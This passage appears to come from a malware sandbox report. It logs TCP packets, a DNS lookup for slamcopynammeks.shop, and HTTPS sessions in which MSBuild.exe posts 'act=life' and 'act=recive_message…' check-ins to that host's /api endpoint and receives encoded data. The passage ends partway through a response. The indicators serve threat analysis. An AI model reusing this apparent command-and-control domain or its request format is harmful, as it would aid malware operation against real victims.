                                          May 24, 2024 10:26:04.097856998 CEST44349708104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:04.098201036 CEST44349708104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:04.099936962 CEST49708443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:04.100099087 CEST49708443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:04.100147963 CEST44349708104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:05.033406019 CEST44349708104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:05.033653975 CEST44349708104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:05.033849955 CEST49708443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:05.034007072 CEST49708443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:05.034048080 CEST44349708104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:05.077790022 CEST49709443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:05.077881098 CEST44349709104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:05.077996969 CEST49709443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:05.078385115 CEST49709443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:05.078421116 CEST44349709104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:05.614173889 CEST44349709104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:05.614444971 CEST49709443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:05.616014004 CEST49709443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:05.616045952 CEST44349709104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:05.616842031 CEST44349709104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:05.617966890 CEST49709443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:05.618149042 CEST49709443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:05.618217945 CEST44349709104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:05.618293047 CEST49709443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:05.618308067 CEST44349709104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:06.303879976 CEST44349709104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:06.304100037 CEST44349709104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:06.304311991 CEST49709443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:06.307766914 CEST49709443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:06.307811022 CEST44349709104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:06.394505978 CEST49710443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:06.394602060 CEST44349710104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:06.394812107 CEST49710443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:06.395319939 CEST49710443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:06.395358086 CEST44349710104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:06.946048975 CEST44349710104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:06.946295977 CEST49710443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:06.948184967 CEST49710443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:06.948215961 CEST44349710104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:06.949022055 CEST44349710104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:06.950822115 CEST49710443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:06.951025009 CEST49710443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:06.951086044 CEST44349710104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:06.951206923 CEST49710443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:06.951224089 CEST44349710104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:07.490089893 CEST49675443192.168.2.523.1.237.91
                                          May 24, 2024 10:26:07.490089893 CEST49674443192.168.2.523.1.237.91
                                          May 24, 2024 10:26:07.583913088 CEST49673443192.168.2.523.1.237.91
                                          May 24, 2024 10:26:07.915713072 CEST44349710104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:07.915956974 CEST44349710104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:07.916199923 CEST49710443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:07.916201115 CEST49710443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:07.968481064 CEST49711443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:07.968573093 CEST44349711104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:07.968694925 CEST49711443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:07.968981981 CEST49711443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:07.969027042 CEST44349711104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:08.224560022 CEST49710443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:08.224642038 CEST44349710104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:08.469177008 CEST44349711104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:08.469782114 CEST49711443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:08.471699953 CEST49711443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:08.471724033 CEST44349711104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:08.472129107 CEST44349711104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:08.473432064 CEST49711443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:08.473617077 CEST49711443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:08.473647118 CEST44349711104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:09.235660076 CEST4434970523.1.237.91192.168.2.5
                                          May 24, 2024 10:26:09.235842943 CEST44349711104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:09.235937119 CEST44349711104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:09.235991001 CEST49705443192.168.2.523.1.237.91
                                          May 24, 2024 10:26:09.236023903 CEST49711443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:09.245407104 CEST49711443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:09.245471954 CEST44349711104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:09.265706062 CEST49712443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:09.265753984 CEST44349712104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:09.265947104 CEST49712443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:09.266376972 CEST49712443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:09.266396999 CEST44349712104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:09.827049017 CEST44349712104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:09.827195883 CEST49712443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:09.828721046 CEST49712443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:09.828742981 CEST44349712104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:09.829155922 CEST44349712104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:09.830292940 CEST49712443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:09.830379963 CEST49712443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:09.830389023 CEST44349712104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:10.535716057 CEST44349712104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:10.535851002 CEST44349712104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:10.535937071 CEST49712443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:10.536005974 CEST49712443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:10.536041021 CEST44349712104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:10.995575905 CEST49713443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:10.995665073 CEST44349713104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:10.995884895 CEST49713443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:10.996309042 CEST49713443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:10.996341944 CEST44349713104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:11.486227989 CEST44349713104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:11.486375093 CEST49713443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:11.487504005 CEST49713443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:11.487517118 CEST44349713104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:11.487848997 CEST44349713104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:11.489417076 CEST49713443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:11.490279913 CEST49713443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:11.490315914 CEST44349713104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:11.490421057 CEST49713443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:11.490458965 CEST44349713104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:11.490577936 CEST49713443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:11.490624905 CEST44349713104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:11.490756035 CEST49713443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:11.490783930 CEST44349713104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:11.490927935 CEST49713443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:11.490956068 CEST44349713104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:11.491127014 CEST49713443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:11.491173029 CEST44349713104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:11.491188049 CEST49713443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:11.491358995 CEST49713443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:11.491389990 CEST49713443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:11.510258913 CEST44349713104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:11.510500908 CEST49713443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:11.510557890 CEST44349713104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:11.510595083 CEST49713443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:11.510618925 CEST49713443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:11.510761023 CEST49713443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:11.510804892 CEST49713443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:11.516132116 CEST44349713104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:11.516457081 CEST49713443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:11.516525984 CEST44349713104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:11.516546011 CEST49713443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:11.522059917 CEST44349713104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:13.859759092 CEST44349713104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:13.859890938 CEST44349713104.21.12.112192.168.2.5
                                          May 24, 2024 10:26:13.860011101 CEST49713443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:13.877173901 CEST49713443192.168.2.5104.21.12.112
                                          May 24, 2024 10:26:13.877223015 CEST44349713104.21.12.112192.168.2.5
                                          TimestampSource PortDest PortSource IPDest IP
                                          May 24, 2024 10:26:01.033318043 CEST5036353192.168.2.51.1.1.1
                                          May 24, 2024 10:26:01.047554016 CEST53503631.1.1.1192.168.2.5
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          May 24, 2024 10:26:01.033318043 CEST192.168.2.51.1.1.10x4dfdStandard query (0)slamcopynammeks.shopA (IP address)IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          May 24, 2024 10:26:01.047554016 CEST1.1.1.1192.168.2.50x4dfdNo error (0)slamcopynammeks.shop104.21.12.112A (IP address)IN (0x0001)false
                                          May 24, 2024 10:26:01.047554016 CEST1.1.1.1192.168.2.50x4dfdNo error (0)slamcopynammeks.shop172.67.152.67A (IP address)IN (0x0001)false
                                          May 24, 2024 10:26:18.663379908 CEST1.1.1.1192.168.2.50xa239No error (0)windowsupdatebg.s.llnwi.net87.248.204.0A (IP address)IN (0x0001)false
                                          May 24, 2024 10:26:19.422689915 CEST1.1.1.1192.168.2.50xf929No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                          May 24, 2024 10:26:19.422689915 CEST1.1.1.1192.168.2.50xf929No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                          • slamcopynammeks.shop
                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.549706104.21.12.1124435316C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          TimestampBytes transferredDirectionData
                                          2024-05-24 08:26:01 UTC267OUTPOST /api HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                          Content-Length: 8
                                          Host: slamcopynammeks.shop
                                          2024-05-24 08:26:01 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                          Data Ascii: act=life
                                          2024-05-24 08:26:02 UTC810INHTTP/1.1 200 OK
                                          Date: Fri, 24 May 2024 08:26:02 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Set-Cookie: PHPSESSID=l0abltnemqc69geu7f0gmcbbmd; expires=Tue, 17-Sep-2024 02:12:41 GMT; Max-Age=9999999; path=/
                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                          Cache-Control: no-store, no-cache, must-revalidate
                                          Pragma: no-cache
                                          CF-Cache-Status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N3j5k4oPtdmON0RCT4CzMNLgIz5OTBaxXCauJNreqUL%2FdDOt6gN%2BwFqfn4WyTXPI3KHY%2B9v2u7L9zV3wt46FFzFzkb7CajMNL7NerG5lz%2F4VbCA0pI5ssPpnYWsANHwGySncxu4fQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 888be6013f146a59-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-05-24 08:26:02 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                          Data Ascii: 2ok
                                          2024-05-24 08:26:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.549707104.21.12.1124435316C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          TimestampBytes transferredDirectionData
                                          2024-05-24 08:26:02 UTC268OUTPOST /api HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                          Content-Length: 55
                                          Host: slamcopynammeks.shop
                                          2024-05-24 08:26:02 UTC55OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 52 54 53 43 66 32 2d 2d 53 75 6e 61 72 75 26 6a 3d 64 65 66 61 75 6c 74
                                          Data Ascii: act=recive_message&ver=4.0&lid=RTSCf2--Sunaru&j=default
                                          2024-05-24 08:26:03 UTC808INHTTP/1.1 200 OK
                                          Date: Fri, 24 May 2024 08:26:03 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Set-Cookie: PHPSESSID=pie7e3njjf6bgd0r657ogvi3nd; expires=Tue, 17-Sep-2024 02:12:42 GMT; Max-Age=9999999; path=/
                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                          Cache-Control: no-store, no-cache, must-revalidate
                                          Pragma: no-cache
                                          CF-Cache-Status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sLQ91TQR6iYX3kE33tiQG35PPyc1vVVjyoneocGd6gTAS41aSZtzvp0EOgL5OEHRci6Kcz1BC7zuR6M%2F6A%2FF7GjEW5P2mliKiZDeR%2BXiy7l2OVNV0227DcXZuXUpXsRBgkjxykpWjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 888be607dcb70f60-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-05-24 08:26:03 UTC561INData Raw: 33 64 62 34 0d 0a 7a 48 58 33 52 4f 33 6c 30 37 58 39 38 6a 68 43 45 44 58 35 73 70 45 50 33 72 58 52 4c 38 73 33 55 51 44 52 6c 58 51 59 4e 4c 4f 33 66 2f 35 6d 6d 38 66 70 6c 63 6e 65 4d 6b 73 79 52 70 79 51 71 79 2b 71 78 36 52 4b 35 7a 31 59 49 72 44 78 56 69 49 55 31 61 30 5a 68 43 48 42 37 39 71 58 6b 49 6f 61 65 44 42 75 38 37 76 71 42 64 65 38 38 30 71 6c 46 57 73 67 38 2b 49 52 65 6c 48 4c 75 42 43 5a 4e 34 53 4b 76 66 57 51 6c 30 77 6a 66 56 53 4b 32 62 39 6d 73 5a 66 39 4a 63 49 2b 63 32 57 72 74 30 34 34 46 76 36 70 41 5a 59 4a 6a 4a 61 34 6c 39 48 34 4d 55 73 79 55 49 32 51 71 79 2f 38 36 66 4e 66 71 6b 55 77 62 61 4c 4a 56 69 4a 50 37 2b 34 63 67 79 47 66 68 4b 66 63 6b 70 78 4c 48 6a 49 50 7a 34 4b 68 50 2b 36 46 72 41 33 42 50 69 77 4b 32
                                          Data Ascii: 3db4zHX3RO3l07X98jhCEDX5spEP3rXRL8s3UQDRlXQYNLO3f/5mm8fplcneMksyRpyQqy+qx6RK5z1YIrDxViIU1a0ZhCHB79qXkIoaeDBu87vqBde880qlFWsg8+IRelHLuBCZN4SKvfWQl0wjfVSK2b9msZf9JcI+c2Wrt044Fv6pAZYJjJa4l9H4MUsyUI2Qqy/86fNfqkUwbaLJViJP7+4cgyGfhKfckpxLHjIPz4KhP+6FrA3BPiwK2
                                          2024-05-24 08:26:03 UTC1369INData Raw: 69 56 38 31 6b 7a 34 47 2f 31 70 4b 51 53 43 68 35 58 4a 37 43 2b 47 53 78 32 72 4e 41 6f 31 6f 77 59 72 54 39 48 48 56 63 31 61 4d 61 6b 79 61 50 78 2f 2b 2f 39 50 73 61 4a 32 6f 58 77 35 4b 7a 54 72 6e 48 74 45 47 2f 46 77 6b 69 32 35 77 4a 4e 44 32 54 37 48 2f 2b 50 2b 66 73 32 70 65 59 6e 42 70 34 4d 42 65 54 31 66 42 75 74 39 69 77 52 61 4a 48 4d 33 43 31 2b 68 4e 6f 55 4e 53 67 48 5a 59 30 68 59 6d 33 31 4a 61 62 55 79 56 31 55 39 75 65 6d 77 62 58 6c 37 52 56 36 51 31 78 49 70 4c 36 48 58 5a 63 78 71 35 58 2f 55 32 51 79 64 6d 38 68 76 67 78 53 7a 4a 51 6c 35 43 72 4c 2f 7a 54 73 6b 6d 6f 55 54 31 73 74 2f 73 51 64 46 76 65 71 42 32 56 49 59 57 50 75 64 61 53 6d 31 55 67 64 31 71 66 31 76 39 73 75 5a 66 39 4a 63 49 2b 63 32 57 72 74 30 34 34 46 76
                                          Data Ascii: iV81kz4G/1pKQSCh5XJ7C+GSx2rNAo1owYrT9HHVc1aMakyaPx/+/9PsaJ2oXw5KzTrnHtEG/Fwki25wJND2T7H/+P+fs2peYnBp4MBeT1fBut9iwRaJHM3C1+hNoUNSgHZY0hYm31JabUyV1U9uemwbXl7RV6Q1xIpL6HXZcxq5X/U2Qydm8hvgxSzJQl5CrL/zTskmoUT1st/sQdFveqB2VIYWPudaSm1Ugd1qf1v9suZf9JcI+c2Wrt044Fv
                                          2024-05-24 08:26:03 UTC1369INData Raw: 4b 6f 36 56 74 74 36 57 6d 6c 73 75 66 56 79 58 31 65 46 6d 73 39 2b 38 54 4b 52 59 4f 47 61 7a 74 31 67 53 50 62 72 75 45 49 31 6d 31 38 58 78 39 70 4b 66 53 43 4e 6a 46 61 37 54 2f 57 4f 37 77 66 4d 6c 77 6b 70 39 43 74 6a 75 66 68 45 39 6b 61 6b 62 31 58 37 4e 78 37 44 62 6b 35 46 56 4a 6e 68 66 6d 4e 48 68 5a 4c 50 66 76 45 53 6f 56 6a 64 6a 75 65 55 45 65 6c 72 44 6f 68 32 54 4b 59 4b 4c 38 5a 6e 33 2b 7a 46 67 64 55 2f 62 69 4c 45 74 6c 74 53 6e 54 71 4d 58 42 6d 47 39 2b 52 46 73 46 72 6e 46 43 4e 74 4f 35 4a 37 5a 76 50 54 51 58 53 77 79 44 39 6d 51 2f 6d 79 30 30 61 46 43 70 46 59 39 62 4c 7a 79 47 58 4a 57 30 61 4d 53 6b 53 32 45 68 4c 7a 54 6a 5a 70 61 4b 48 64 57 6b 64 71 7a 49 39 53 38 32 41 32 75 54 58 4d 36 38 62 63 6e 62 56 32 54 6d 78 53
                                          Data Ascii: Ko6Vtt6WmlsufVyX1eFms9+8TKRYOGazt1gSPbruEI1m18Xx9pKfSCNjFa7T/WO7wfMlwkp9CtjufhE9kakb1X7Nx7Dbk5FVJnhfmNHhZLPfvESoVjdjueUEelrDoh2TKYKL8Zn3+zFgdU/biLEtltSnTqMXBmG9+RFsFrnFCNtO5J7ZvPTQXSwyD9mQ/my00aFCpFY9bLzyGXJW0aMSkS2EhLzTjZpaKHdWkdqzI9S82A2uTXM68bcnbV2TmxS
                                          2024-05-24 08:26:03 UTC1369INData Raw: 4c 66 53 6b 70 64 52 49 32 42 46 6d 4e 54 39 59 66 79 5a 32 79 62 43 46 54 52 36 38 36 39 55 4f 6e 50 47 72 51 65 54 4a 63 2f 76 32 73 6a 52 2b 44 45 35 47 6a 7a 77 6b 50 52 68 2f 49 2f 78 44 61 6c 62 50 32 6d 30 2f 42 31 2b 55 74 47 6a 48 4a 73 6f 68 6f 75 35 32 35 69 43 56 79 56 36 58 5a 4c 56 2f 32 43 2f 78 62 42 4d 36 52 74 62 43 64 69 33 45 57 49 57 69 65 78 58 73 68 57 34 70 50 47 2f 39 49 38 55 53 42 6c 4f 38 37 75 59 4c 62 76 62 38 78 58 72 46 54 4a 71 74 50 6b 53 61 46 6a 44 6f 42 43 56 49 49 65 50 74 74 75 52 6e 6b 67 6f 63 31 65 56 33 2f 74 6b 75 4e 61 33 53 61 56 53 63 79 7a 62 6e 48 30 36 55 63 6e 75 54 39 64 6d 70 34 53 72 7a 64 32 2b 55 53 42 31 52 34 33 4c 73 77 58 58 79 50 30 6c 77 6b 78 62 43 64 69 33 45 58 59 57 69 65 78 58 6b 53 32 46
                                          Data Ascii: LfSkpdRI2BFmNT9YfyZ2ybCFTR6869UOnPGrQeTJc/v2sjR+DE5GjzwkPRh/I/xDalbP2m0/B1+UtGjHJsohou525iCVyV6XZLV/2C/xbBM6RtbCdi3EWIWiexXshW4pPG/9I8USBlO87uYLbvb8xXrFTJqtPkSaFjDoBCVIIePttuRnkgoc1eV3/tkuNa3SaVScyzbnH06UcnuT9dmp4Srzd2+USB1R43LswXXyP0lwkxbCdi3EXYWiexXkS2F
                                          2024-05-24 08:26:03 UTC1369INData Raw: 53 54 55 43 6c 78 57 35 33 52 2f 57 32 79 31 2f 4d 44 77 54 35 59 49 72 54 76 56 69 49 55 6b 59 34 63 67 7a 4f 4d 6c 37 66 51 6b 39 41 79 53 32 30 5a 38 37 76 71 42 64 65 38 38 30 71 6c 46 57 73 67 38 2f 6b 45 66 6c 66 52 70 68 36 5a 4c 59 65 56 74 74 43 55 6e 6c 51 72 64 6c 75 53 32 2f 70 6f 73 4e 61 34 52 4b 78 52 4f 57 53 2b 74 31 67 53 50 62 72 75 45 49 31 6d 31 38 58 78 2b 35 79 66 55 57 41 61 50 49 53 65 6d 77 61 6c 76 39 67 6d 36 56 49 2f 49 75 75 31 56 6e 31 65 32 61 41 55 6b 79 32 44 69 37 44 65 6d 5a 56 53 4a 33 31 51 6b 74 66 7a 61 36 37 51 76 6b 53 70 58 6a 70 6f 74 2f 59 64 4f 68 69 35 78 58 7a 56 49 5a 66 48 36 5a 58 66 6f 6c 30 32 59 6c 54 62 75 4a 68 79 38 72 7a 62 4a 72 41 39 57 41 6e 7a 38 42 6f 36 44 70 50 75 47 6f 63 6e 69 70 57 31 32
                                          Data Ascii: STUClxW53R/W2y1/MDwT5YIrTvViIUkY4cgzOMl7fQk9AyS20Z87vqBde880qlFWsg8/kEflfRph6ZLYeVttCUnlQrdluS2/posNa4RKxROWS+t1gSPbruEI1m18Xx+5yfUWAaPISemwalv9gm6VI/Iuu1Vn1e2aAUky2Di7DemZVSJ31Qktfza67QvkSpXjpot/YdOhi5xXzVIZfH6ZXfol02YlTbuJhy8rzbJrA9WAnz8Bo6DpPuGocnipW12
                                          2024-05-24 08:26:03 UTC1369INData Raw: 73 66 56 53 55 30 2f 42 73 74 73 57 68 51 61 42 64 4e 6d 36 34 2b 52 42 6f 55 4e 36 6e 46 4a 59 76 69 49 2b 39 33 5a 79 58 47 6d 34 61 50 50 43 51 39 48 58 38 6a 2f 45 4e 69 6b 49 6a 62 2f 4f 66 66 57 55 59 75 63 55 4f 2f 55 33 6b 78 37 62 62 33 38 67 59 59 48 70 61 6b 39 72 33 61 72 48 51 74 55 53 37 58 44 5a 73 73 2f 4d 64 64 56 44 56 72 52 65 48 49 49 75 50 73 74 71 53 6e 6c 6b 6b 4d 68 6e 7a 75 35 67 74 75 38 2f 7a 46 65 73 56 41 57 2b 39 37 42 6c 39 52 39 76 75 66 2f 34 35 77 65 2f 61 7a 76 66 37 4d 57 42 31 57 39 75 49 73 53 32 34 32 61 46 47 71 46 34 34 62 4c 54 34 45 33 42 57 33 71 6f 55 6d 79 32 4f 68 4c 6e 61 6b 70 35 51 4b 58 74 51 6c 39 54 30 4c 66 4b 2f 32 43 62 70 55 69 73 69 36 37 56 57 55 58 66 38 67 68 43 50 5a 75 66 73 72 70 6e 33 2b 30
                                          Data Ascii: sfVSU0/BstsWhQaBdNm64+RBoUN6nFJYviI+93ZyXGm4aPPCQ9HX8j/ENikIjb/OffWUYucUO/U3kx7bb38gYYHpak9r3arHQtUS7XDZss/MddVDVrReHIIuPstqSnlkkMhnzu5gtu8/zFesVAW+97Bl9R9vuf/45we/azvf7MWB1W9uIsS242aFGqF44bLT4E3BW3qoUmy2OhLnakp5QKXtQl9T0LfK/2CbpUisi67VWUXf8ghCPZufsrpn3+0
                                          2024-05-24 08:26:03 UTC1369INData Raw: 6d 4d 62 2b 66 66 79 2f 32 46 4c 6e 50 56 68 37 32 35 78 39 4f 6c 48 64 37 6b 2f 58 5a 6f 6d 4f 74 39 43 5a 6e 6b 67 6c 64 46 69 55 32 66 70 70 74 4e 53 7a 53 61 31 53 4e 6d 47 2f 2f 42 46 35 57 64 57 6e 47 5a 77 70 7a 38 6e 5a 76 50 54 51 58 54 67 79 44 39 6d 51 30 6e 61 2f 32 37 34 4e 77 54 34 73 4c 4e 75 63 44 78 49 39 75 75 34 51 6d 57 62 58 78 66 48 62 6b 5a 56 61 4b 6e 52 54 6e 74 62 35 61 4c 7a 63 73 45 4b 74 55 7a 64 74 73 2f 77 66 65 31 44 55 70 42 79 54 4b 34 79 42 74 35 66 52 2b 44 46 4c 4d 6c 43 44 6b 4b 73 76 2f 50 65 6f 51 4b 56 53 63 77 72 59 36 46 67 53 50 63 6a 47 66 50 35 6d 69 49 76 78 6a 39 33 51 55 53 78 32 55 4a 76 64 38 47 57 35 30 37 6c 49 71 56 30 68 61 72 50 77 42 47 68 57 32 4b 73 62 6c 69 61 4c 67 62 6a 52 6e 4a 51 61 62 68 6f
                                          Data Ascii: mMb+ffy/2FLnPVh725x9OlHd7k/XZomOt9CZnkgldFiU2fpptNSzSa1SNmG//BF5WdWnGZwpz8nZvPTQXTgyD9mQ0na/274NwT4sLNucDxI9uu4QmWbXxfHbkZVaKnRTntb5aLzcsEKtUzdts/wfe1DUpByTK4yBt5fR+DFLMlCDkKsv/PeoQKVScwrY6FgSPcjGfP5miIvxj93QUSx2UJvd8GW507lIqV0harPwBGhW2KsbliaLgbjRnJQabho
